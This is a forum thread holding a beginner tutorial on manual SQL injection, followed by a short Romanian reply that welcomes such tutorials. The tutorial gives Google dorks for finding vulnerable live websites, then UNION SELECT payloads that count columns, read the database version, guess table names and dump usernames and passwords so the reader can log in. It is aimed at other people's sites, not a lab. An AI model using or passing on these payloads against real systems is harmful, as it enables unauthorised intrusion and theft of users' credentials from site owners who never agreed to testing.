Jump to content
FiliBlox

[TUTORIAL]Manual SQL Injection

Recommended Posts

Posted

I am aware there are many tutorials like this, but I wanted to contribute.

This is going to be a very simple tutorial, hopefully you can follow it well.

1. What is SQL Injection?

Quote:A SQL injection attack consists of insertion or

"injection" of a SQL query via the input data from the

client to the application. A successful SQL injection

exploit can read sensitive data from the database,

modify database data (Insert/Update/Delete), execute

administration operations on the database (such as

shutdown the DBMS), recover the content of a given file

present on the DBMS file system and in some cases issue

commands to the operating system. SQL injection attacks

are a type of injection attack, in which SQL commands

are injected into data-plane input in order to effect

the execution of predefined SQL commands.

Source.

2. Finding a target(I don't see the point of attacking useless websites, but you can if you want)

Now we want to use a google dork to find a vulnerable site.

Here are a few dorks.

Quote:Inurl:admin.php?p=

Inurl:contact.php?ID=

inurl:help.php?id=

3. Now we want to test the webpage for vulnerabilities.

Now that you have found a site, we need to test it.

Do this by adding a

Code:

'

after the last number in the URL.

Code:

vuln.com'

If you get an error like this one, then the site can be exploited.

Quote:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

4. Getting the columns.

Now we must find the amount of columns the vulnerable webpage has.

To do this we will use the ORDER BY statement.

Code:

vuln.com order by 1/* no error

vuln.com order by 2/* no error

vuln.com order by 3/* no error

vuln.com order by 4/* no error

vuln.com order by 5/* error

This tells us that there are four columns.

5.Check the Union Function

Union allows you to select more data in one SQL statement.(Correct me if I'm wrong)

Now we want to do this.

Code:

vuln.com Union all select 1,2,3,4/*

If there are numbers on the screen that means the Union works.

6. Now we will get the version.

Code:

vuln.com Union select all 1,2,3,4/*

if /* doesn't work you can try:

Code:

--

.

We'll pretend the number 3 is shown on the screen.

Now we will replace the number 3 with @@version

Code:

vuln.com Union all select 1,2,@@version,4/*

You should now have a version number, something similar too.

Quote:4.5.6

[align=center]7. Finding table and column names.

We will need to guess the table names now.

Some common table names are:

Quote: admins,users,members,emails,user.

Common column names: users,user,password,pass

Code:

vuln.com Union all select 1,2,3,4 from tablename/*

If you see the number 3 again, that means the table exists.

Now we need to get the column name, to do so we do this.

Code:

vuln.com Union all select 1,2,user,4 from tablename/*

If usernames pop up it works, if not try another.

If names are displayed you would need to find the passwords and emails.

Now we want to get the usernames and passwords at the same time, to do this we use concat. (Basically it joins the strings)

Code:

vuln.com Union all select 1,2,concat(username,0x3a,password),4 from tablename/*

0x3a = :

Now you should get the username and password in a nice format.

Example:

Code:

Name : password

Now if the password isn't encrypted you can login!

The most common password encryption method is MD5.

Source:HF

Posted

Dupa parerea mea, oricand este bine venit un nou tutorial, chiar daca se adreseaza incepatorilor.

Daca un moderator, administrator sau cineva din staff considera ca nu isi are rostul, sa il stearga, eu nu ma impun dorintei lor.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...